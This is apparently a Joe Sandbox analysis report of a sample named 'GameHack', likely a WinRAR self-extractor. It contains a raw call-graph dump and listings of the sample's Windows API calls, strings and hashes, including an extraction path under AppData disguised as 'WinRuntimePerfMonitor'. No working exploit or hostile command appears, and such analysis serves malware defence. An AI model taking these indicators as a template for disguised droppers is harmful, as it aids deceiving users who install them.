24533->24534 24535 ee00c8 24533->24535 24536 ee00bb LoadLibraryW 24534->24536 24535->24438 24536->24535 24537->24440 24539 ef35bb 24538->24539 24539->24470 24539->24539 24540->24487 24542 ee9e3e SizeofResource 24541->24542 24544 ee9e70 24541->24544 24543 ee9e52 LoadResource 24542->24543 24542->24544 24543->24544 24545 ee9e63 LockResource 24543->24545 24544->24498 24545->24544 24546 ee9e77 GlobalAlloc 24545->24546 24546->24544 24547 ee9e92 GlobalLock 24546->24547 24548 ee9f21 GlobalFree 24547->24548 24549 ee9ea1 __vsnwprintf_l 24547->24549 24548->24544 24550 ee9ea9 CreateStreamOnHGlobal 24549->24550 24551 ee9f1a GlobalUnlock 24550->24551 24552 ee9ec1 24550->24552 24551->24548 24560 ee9d7b GdipAlloc 24552->24560 24555 ee9eef GdipCreateHBITMAPFromBitmap 24556 ee9f05 24555->24556 24556->24551 24557->24509 24558->24512 24559->24514 24561 ee9d9a 24560->24561 24562 ee9d8d 24560->24562 24561->24551 24561->24555 24561->24556 24564 ee9b0f 24562->24564 24565 ee9b37 GdipCreateBitmapFromStream 24564->24565 24566 ee9b30 GdipCreateBitmapFromStreamICM 24564->24566 24567 ee9b3c 24565->24567 24566->24567 24567->24561 24569 edd34b _wcschr __EH_prolog 24568->24569 24570 edd37a GetModuleFileNameW 24569->24570 24571 edd3ab 24569->24571 24572 edd394 24570->24572 24610 ed99b0 24571->24610 24572->24571 24574 ed9653 79 API calls 24577 edd7ab 24574->24577 24575 edd407 24621 ef5a90 26 API calls 3 library calls 24575->24621 24577->24517 24578 edd3db 24578->24575 24580 ee3781 76 API calls 24578->24580 24592 edd627 24578->24592 24579 edd41a 24622 ef5a90 26 API calls 3 library calls 24579->24622 24580->24578 24582 edd563 24582->24592 24640 ed9d30 77 API calls 24582->24640 24586 edd57d new 24587 ed9bf0 80 API calls 24586->24587 24586->24592 24590 edd5a6 new 24587->24590 24589 edd42c 24589->24582 24589->24592 24623 ed9e40 24589->24623 24631 ed9bf0 24589->24631 24639 ed9d30 77 API calls 24589->24639 24590->24592 24602 edd5b2 new 24590->24602 24641 ee137a MultiByteToWideChar 24590->24641 24592->24574 24593 edd72b 24642 edce72 76 API calls 24593->24642 24595 edda0a 24647 edce72 76 API calls 24595->24647 24597 edd771 24643 ef5a90 26 API calls 3 library calls 24597->24643 24598 edd9fa 24598->24517 24600 edd742 24600->24597 24603 ee3781 76 API calls 24600->24603 24601 edd78b 24644 ef5a90 26 API calls 3 library calls 24601->24644 24602->24592 24602->24593 24602->24595 24602->24598 24605 ee1596 WideCharToMultiByte 24602->24605 24645 eddd6b 50 API calls __vsnprintf 24602->24645 24646 ef58d9 26 API calls 3 library calls 24602->24646 24603->24600 24605->24602 24609 edd32f 24608->24609 24609->24520 24611 ed99ba 24610->24611 24612 ed9a39 CreateFileW 24611->24612 24613 ed9a59 GetLastError 24612->24613 24614 ed9aaa 24612->24614 24616 edb66c 2 API calls 24613->24616 24615 ed9ae1 24614->24615 24617 ed9ac7 SetFileTime 24614->24617 24615->24578 24618 ed9a79 24616->24618 24617->24615 24618->24614 24619 ed9a7d CreateFileW GetLastError 24618->24619 24620 ed9aa1 24619->24620 24620->24614 24621->24579 24622->24589 24624 ed9e64 SetFilePointer 24623->24624 24625 ed9e53 24623->24625 24626 ed9e9d 24624->24626 24627 ed9e82 GetLastError 24624->24627 24625->24626 24648 ed6fa5 75 API calls 24625->24648 24626->24589 24627->24626 24629 ed9e8c 24627->24629 24629->24626 24649 ed6fa5 75 API calls 24629->24649 24632 ed9c03 24631->24632 24636 ed9bfc 24631->24636 24634 ed9c9e 24632->24634 24632->24636 24637 ed9cc0 24632->24637 24650 ed984e 24632->24650 24634->24636 24662 ed6f6b 75 API calls 24634->24662 24636->24589 24637->24636 24638 ed984e 5 API calls 24637->24638 24638->24637 24639->24589 24640->24586 24641->24602 24642->24600 24643->24601 24644->24592 24645->24602 24646->24602 24647->24598 24648->24624 24649->24626 24651 ed985c GetStdHandle 24650->24651 24652 ed9867 ReadFile 24650->24652 24651->24652 24653 ed98a0 24652->24653 24654 ed9880 24652->24654 24653->24632 24655 ed9989 GetFileType 24654->24655 24656 ed9887 24655->24656 24657 ed9895 24656->24657 24658 ed98a8 GetLastError 24656->24658 24659 ed98b7 24656->24659 24661 ed984e GetFileType 24657->24661 24658->24653 24658->24659 24659->24653 24660 ed98c7 GetLastError 24659->24660 24660->24653 24660->24657 24661->24653 24662->24636 24664 ef7430 _abort 24663->24664 24665 ef7448 24664->24665 24667 ef757e _abort GetModuleHandleW 24664->24667 24685 efa3f1 EnterCriticalSection 24665->24685 24668 ef743c 24667->24668 24668->24665 24697 ef75c2 GetModuleHandleExW 24668->24697 24669 ef74ee 24686 ef752e 24669->24686 24672 ef7450 24672->24669 24674 ef74c5 24672->24674 24705 ef7f30 20 API calls _abort 24672->24705 24675 ef74dd 24674->24675 24679 ef81f1 _abort 5 API calls 24674->24679 24680 ef81f1 _abort 5 API calls 24675->24680 24676 ef750b 24689 ef753d 24676->24689 24677 ef7537 24706 f01a19 5 API calls TranslatorGuardHandler 24677->24706 24679->24675 24680->24669 24685->24672 24707 efa441 LeaveCriticalSection 24686->24707 24688 ef7507 24688->24676 24688->24677 24708 efa836 24689->24708 24692 ef756b 24695 ef75c2 _abort 8 API calls 24692->24695 24693 ef754b GetPEB 24693->24692 24694 ef755b GetCurrentProcess TerminateProcess 24693->24694 24694->24692 24696 ef7573 ExitProcess 24695->24696 24698 ef760f 24697->24698 24699 ef75ec GetProcAddress 24697->24699 24700 ef761e 24698->24700 24701 ef7615 FreeLibrary 24698->24701 24704 ef7601 24699->24704 24702 eeec4a TranslatorGuardHandler 5 API calls 24700->24702 24701->24700 24703 ef7628 24702->24703 24703->24665 24704->24698 24705->24674 24707->24688 24709 efa85b 24708->24709 24710 efa851 24708->24710 24711 efa458 __dosmaperr 5 API calls 24709->24711 24712 eeec4a TranslatorGuardHandler 5 API calls 24710->24712 24711->24710 24713 ef7547 24712->24713 24713->24692 24713->24693 24853 eeacd0 100 API calls 24903 ee19d0 26 API calls std::bad_exception::bad_exception 24854 eee4a2 38 API calls ___FrameUnwindToState 24855 ed96a0 79 API calls 24906 efe9a0 51 API calls 24858 ef76bd 52 API calls 3 library calls 24908 ef79b7 55 API calls _free 24860 ed16b0 84 API calls 24737 ef90b0 24745 efa56f 24737->24745 24740 ef90c4 24742 ef90cc 24743 ef90d9 24742->24743 24753 ef90e0 11 API calls 24742->24753 24746 efa458 __dosmaperr 5 API calls 24745->24746 24747 efa596 24746->24747 24748 efa59f 24747->24748 24749 efa5ae TlsAlloc 24747->24749 24750 eeec4a TranslatorGuardHandler 5 API calls 24748->24750 24749->24748 24751 ef90ba 24750->24751 24751->24740 24752 ef9029 20 API calls 2 library calls 24751->24752 24752->24742 24753->24740 24754 efa3b0 24755 efa3bb 24754->24755 24756 efa6ca 11 API calls 24755->24756 24757 efa3e4 24755->24757 24758 efa3e0 24755->24758 24756->24755 24760 efa410 DeleteCriticalSection 24757->24760 24760->24758 24861 ef1eb0 6 API calls 3 library calls 24826 ed1385 82 API calls 3 library calls 24910 ef5780 QueryPerformanceFrequency QueryPerformanceCounter 24863 eea89d 78 API calls 24864 edea98 FreeLibrary 24911 ef2397 48 API calls 24835 eed997 24836 eed89b 24835->24836 24837 eedf59 ___delayLoadHelper2@8 19 API calls 24836->24837 24837->24836 24866 ee7090 114 API calls 24867 eecc90 70 API calls 24912 eea990 97 API calls 24913 ee9b90 GdipCloneImage GdipAlloc 24840 eed891 19 API calls ___delayLoadHelper2@8 24914 ef9b90 21 API calls 2 library calls 24873 eefc60 51 API calls 2 library calls 24875 ef3460 RtlUnwind 24876 ef9c60 71 API calls _free 24877 ed1075 82 API calls pre_c_initialization 24878 ee5c77 121 API calls __vsnwprintf_l 24026 eed573 24027 eed580 24026->24027 24028 edddd1 53 API calls 24027->24028 24029 eed594 24028->24029 24030 ed400a _swprintf 51 API calls 24029->24030 24031 eed5a6 SetDlgItemTextW 24030->24031 24032 eeac74 5 API calls 24031->24032 24033 eed5c3 24032->24033 24916 eed34e DialogBoxParamW 24881 ee8c40 GetClientRect 24882 eeec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24883 ef3040 5 API calls 2 library calls 24917 eebe49 98 API calls 3 library calls 24884 f00040 IsProcessorFeaturePresent 24048 ed9b59 24049 ed9bd7 24048->24049 24050 ed9b63 24048->24050 24051 ed9bad SetFilePointer 24050->24051 24051->24049 24052 ed9bcd GetLastError 24051->24052 24052->24049 24918 ee9b50 GdipDisposeImage GdipFree __except_handler4 24886 ef8050 8 API calls ___vcrt_uninitialize 24718 ed9f2f 24719 ed9f3d 24718->24719 24720 ed9f44 24718->24720 24721 ed9f4a GetStdHandle 24720->24721 24728 ed9f55 24720->24728 24721->24728 24722 ed9fa9 WriteFile 24722->24728 24723 ed9f7c WriteFile 24725 ed9f7a 24723->24725 24723->24728 24725->24723 24725->24728 24726 eda031 24730 ed7061 75 API calls 24726->24730 24728->24719 24728->24722 24728->24723 24728->24725 24728->24726 24729 ed6e18 60 API calls 24728->24729 24729->24728 24730->24719 24887 ed1025 29 API calls pre_c_initialization 24924 eebe49 103 API calls 4 library calls 24736 efb731 31 API calls TranslatorGuardHandler 24888 eea430 73 API calls 24761 eec40e 24762 eec4c7 24761->24762 24770 eec42c _wcschr 24761->24770 24763 eec4e5 24762->24763 24780 eebe49 _wcsrchr 24762->24780 24796 eece22 24762->24796 24766 eece22 18 API calls 24763->24766 24763->24780 24765 eeaa36 ExpandEnvironmentStringsW 24765->24780 24766->24780 24767 eeca8d 24768 ee17ac CompareStringW 24768->24770 24770->24762 24770->24768 24771 eec11d SetWindowTextW 24771->24780 24774 ef35de 22 API calls 24774->24780 24776 eebf0b SetFileAttributesW 24777 eebfc5 GetFileAttributesW 24776->24777 24778 eebf25 ___scrt_get_show_window_mode 24776->24778 24777->24780 24782 eebfd7 DeleteFileW 24777->24782 24778->24777 24778->24780 24792 edb4f7 52 API calls 2 library calls 24778->24792 24780->24765 24780->24767 24780->24771 24780->24774 24780->24776 24783 eec2e7 GetDlgItem SetWindowTextW SendMessageW 24780->24783 24785 eec327 SendMessageW 24780->24785 24790 ee17ac CompareStringW 24780->24790 24791 ee9da4 GetCurrentDirectoryW 24780->24791 24793 eda52a 7 API calls 24780->24793 24794 eda4b3 FindClose 24780->24794 24795 eeab9a 76 API calls new 24780->24795 24782->24780 24787 eebfe8 24782->24787 24783->24780 24784 ed400a _swprintf 51 API calls 24786 eec008 GetFileAttributesW 24784->24786 24785->24780 24786->24787 24788 eec01d MoveFileW 24786->24788 24787->24784 24788->24780 24789 eec035 MoveFileExW 24788->24789 24789->24780 24790->24780 24791->24780 24792->24778 24793->24780 24794->24780 24795->24780 24799 eece2c ___scrt_get_show_window_mode 24796->24799 24797 eed08a 24797->24763 24798 eecf1b 24801 eda180 4 API calls 24798->24801 24799->24797 24799->24798 24819 ee17ac CompareStringW 24799->24819 24802 eecf30 24801->24802 24803 eecf4f ShellExecuteExW 24802->24803 24820 edb239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24802->24820 24803->24797 24810 eecf62 24803->24810 24805 eecf47 24805->24803 24806 eecf9b 24821 eed2e6 6 API calls 24806->24821 24807 eecff1 CloseHandle 24808 eed00a 24807->24808 24809 eecfff 24807->24809 24808->24797 24815 eed081 ShowWindow 24808->24815 24822 ee17ac CompareStringW 24809->24822 24810->24806 24810->24807 24813 eecf91 ShowWindow 24810->24813 24813->24806 24814 eecfb3 24814->24807 24816 eecfc6 GetExitCodeProcess 24814->24816 24815->24797 24816->24807 24817 eecfd9 24816->24817 24817->24807 24819->24798 24820->24805 24821->24814 24822->24808 24889 eeec0b 28 API calls 2 library calls 24927 eedb0b 19 API calls ___delayLoadHelper2@8 24928 ed1f05 126 API calls __EH_prolog 24890 eeea00 46 API calls 6 library calls 24929 eebe49 108 API calls 4 library calls 24930 efa918 27 API calls 3 library calls 24931 ed6110 80 API calls 24932 efb710 GetProcessHeap

                                      Executed Functions

                                      Function 00EED5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00EE00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00EE00E4
                                        • Part of subcall function 00EE00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EE00F6
                                        • Part of subcall function 00EE00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EE0127
                                        • Part of subcall function 00EE9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00EE9DAC
                                        • Part of subcall function 00EEA335: OleInitialize.OLE32(00000000), ref: 00EEA34E
                                        • Part of subcall function 00EEA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EEA385
                                        • Part of subcall function 00EEA335: SHGetMalloc.SHELL32(00F18430), ref: 00EEA38F
                                        • Part of subcall function 00EE13B3: GetCPInfo.KERNEL32(00000000,?), ref: 00EE13C4
                                        • Part of subcall function 00EE13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00EE13D8
                                      • GetCommandLineW.KERNEL32 ref: 00EED61C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00EED643
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00EED654
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00EED68E
                                        • Part of subcall function 00EED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EED29D
                                        • Part of subcall function 00EED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EED2D9
                                      • CloseHandle.KERNEL32(00000000), ref: 00EED697
                                      • GetModuleFileNameW.KERNEL32(00000000,00F2DC90,00000800), ref: 00EED6B2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00F2DC90), ref: 00EED6BE
                                      • GetLocalTime.KERNEL32(?), ref: 00EED6C9
                                      • _swprintf.LIBCMT ref: 00EED708
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00EED71A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00EED721
                                      • LoadIconW.USER32(00000000,00000064), ref: 00EED738
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00EED789
                                      • Sleep.KERNEL32(?), ref: 00EED7B7
                                      • DeleteObject.GDI32 ref: 00EED7F0
                                      • DeleteObject.GDI32(?), ref: 00EED800
                                      • CloseHandle.KERNEL32 ref: 00EED843
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 788466649-2753588727
                                      • Opcode ID: dad913b341d9472ea5713545244385add40d22a16c5a8d8d17c4f114348c18ac
                                      • Instruction ID: 6d460ee9860bb24ed84b3846a2dce44803441ada5d8b4b18b575109e0c3337aa
                                      • Opcode Fuzzy Hash: dad913b341d9472ea5713545244385add40d22a16c5a8d8d17c4f114348c18ac
                                      • Instruction Fuzzy Hash: C061E57190438DAFD320AFA2EC49F6A37ECBB48744F005429F545E22A1DFB4D945EB62
                                      Function 00EDA5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 966 eda5f4-eda61f call eee360 969 eda691-eda69a FindNextFileW 966->969 970 eda621-eda632 FindFirstFileW 966->970 971 eda69c-eda6aa GetLastError 969->971 972 eda6b0-eda6b2 969->972 973 eda6b8-eda75c call edfe56 call edbcfb call ee0e19 * 3 970->973 974 eda638-eda64f call edb66c 970->974 971->972 972->973 975 eda761-eda774 972->975 973->975 981 eda66a-eda673 GetLastError 974->981 982 eda651-eda668 FindFirstFileW 974->982 984 eda675-eda678 981->984 985 eda684 981->985 982->973 982->981 984->985 987 eda67a-eda67d 984->987 988 eda686-eda68c 985->988 987->985 990 eda67f-eda682 987->990 988->975 990->988
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA628
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA65E
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA66A
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA692
                                      • GetLastError.KERNEL32(?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA69E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next
                                      • String ID:
                                      • API String ID: 869497890-0
                                      • Opcode ID: 06d65dfdd5d700108792a2d5dfd573e0e74a7705cecbba3745dbcd5d95c8a358
                                      • Instruction ID: 6115f5700755fc5e554217e2068ab0c8e396ef11c8987c211138366c149676cf
                                      • Opcode Fuzzy Hash: 06d65dfdd5d700108792a2d5dfd573e0e74a7705cecbba3745dbcd5d95c8a358
                                      • Instruction Fuzzy Hash: 5E417371504245EFC720EF78C884ADAF7E8FB48344F08092AF5A9E3250D774AA558B52
                                      Function 00EF753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002,00000000), ref: 00EF755E
                                      • TerminateProcess.KERNEL32(00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002,00000000), ref: 00EF7565
                                      • ExitProcess.KERNEL32 ref: 00EF7577
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: df44bd0d3be4c9629b5b22512e14ecd4c778756f246d8472e81bc6fb3a4fa1b9
                                      • Instruction ID: 3c117ede05d7ad70315928cd8fd8fd2fe9d1b27a8e98d961ded20223a18042b8
                                      • Opcode Fuzzy Hash: df44bd0d3be4c9629b5b22512e14ecd4c778756f246d8472e81bc6fb3a4fa1b9
                                      • Instruction Fuzzy Hash: CCE0B63110564CABDF11AF64DD09A693B69FB44785F109424FA49AA222CB35DE42DA90
                                      Function 00ED857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID:
                                      • API String ID: 3004599000-0
                                      • Opcode ID: 7f28d2e72eee07ffcdf1be3a46dd194c5c7ed9b7a77079d77a57d4a1c7fb3682
                                      • Instruction ID: 8b4a1cd7e1c8d93940072f26fa8361f35061c6294f04cdca185a8cd88b2cf6b3
                                      • Opcode Fuzzy Hash: 7f28d2e72eee07ffcdf1be3a46dd194c5c7ed9b7a77079d77a57d4a1c7fb3682
                                      • Instruction Fuzzy Hash: 37821970904245AEDF25DB60C985BFAB7B9EF05304F0861BBE859BB383DB315A46CB50
                                      Function 00EEAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EEAEE5
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prologItemTextWindow
                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                      • API String ID: 810644672-2179422497
                                      • Opcode ID: b2d6c5b2dff85ce516a5a6da6e70777b4669ddf0ba9ff94fdf881d0290dc36db
                                      • Instruction ID: b3ff98b4d47dde0ecf89531fd150214d3ccf45ab4047ea984f5671af0b595bf7
                                      • Opcode Fuzzy Hash: b2d6c5b2dff85ce516a5a6da6e70777b4669ddf0ba9ff94fdf881d0290dc36db
                                      • Instruction Fuzzy Hash: 1C4204B094429CBEEB21ABA19D8AFFF37BDEB01744F006155F601B61E1CB744945EB22
                                      Function 00EE00CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 257 ee00cf-ee00ee call eee360 GetModuleHandleW 260 ee0154-ee03b2 257->260 261 ee00f0-ee0107 GetProcAddress 257->261 262 ee03b8-ee03c3 call ef70dd 260->262 263 ee0484-ee04b3 GetModuleFileNameW call edbc85 call edfe56 260->263 264 ee0109-ee011f 261->264 265 ee0121-ee0131 GetProcAddress 261->265 262->263 274 ee03c9-ee03fa GetModuleFileNameW CreateFileW 262->274 279 ee04b5-ee04bf call edacf5 263->279 264->265 265->260 266 ee0133-ee0152 265->266 266->260 276 ee03fc-ee040a SetFilePointer 274->276 277 ee0478-ee047f CloseHandle 274->277 276->277 280 ee040c-ee0429 ReadFile 276->280 277->263 286 ee04cc 279->286 287 ee04c1-ee04c5 call ee0085 279->287 280->277 282 ee042b-ee0450 280->282 283 ee046d-ee0476 call edfbd8 282->283 283->277 294 ee0452-ee046c call ee0085 283->294 289 ee04ce-ee04d0 286->289 291 ee04ca 287->291 292 ee04f2-ee0518 call edbcfb GetFileAttributesW 289->292 293 ee04d2-ee04f0 CompareStringW 289->293 291->289 296 ee051a-ee051e 292->296 301 ee0522 292->301 293->292 293->296 294->283 296->279 300 ee0520 296->300 302 ee0526-ee0528 300->302 301->302 303 ee052a 302->303 304 ee0560-ee0562 302->304 307 ee052c-ee0552 call edbcfb GetFileAttributesW 303->307 305 ee066f-ee0679 304->305 306 ee0568-ee057f call edbccf call edacf5 304->306 317 ee05e7-ee061a call ed400a AllocConsole 306->317 318 ee0581-ee05e2 call ee0085 * 2 call edddd1 call ed400a call edddd1 call ee9f35 306->318 312 ee055c 307->312 313 ee0554-ee0558 307->313 312->304 313->307 315 ee055a 313->315 315->304 323 ee061c-ee0661 GetCurrentProcessId AttachConsole call ef35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->323 324 ee0667-ee0669 ExitProcess 317->324 318->324 323->324
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00EE00E4
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EE00F6
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EE0127
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EE03D4
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE03F0
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EE0402
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00F03BA4,00000000), ref: 00EE0421
                                      • CloseHandle.KERNEL32(00000000), ref: 00EE0479
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EE048F
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00EE04E7
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00EE0510
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00EE054A
                                        • Part of subcall function 00EE0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                        • Part of subcall function 00EE0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      • _swprintf.LIBCMT ref: 00EE05BE
                                      • _swprintf.LIBCMT ref: 00EE060A
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • AllocConsole.KERNEL32 ref: 00EE0612
                                      • GetCurrentProcessId.KERNEL32 ref: 00EE061C
                                      • AttachConsole.KERNEL32(00000000), ref: 00EE0623
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00EE0649
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00EE0650
                                      • Sleep.KERNEL32(00002710), ref: 00EE065B
                                      • FreeConsole.KERNEL32 ref: 00EE0661
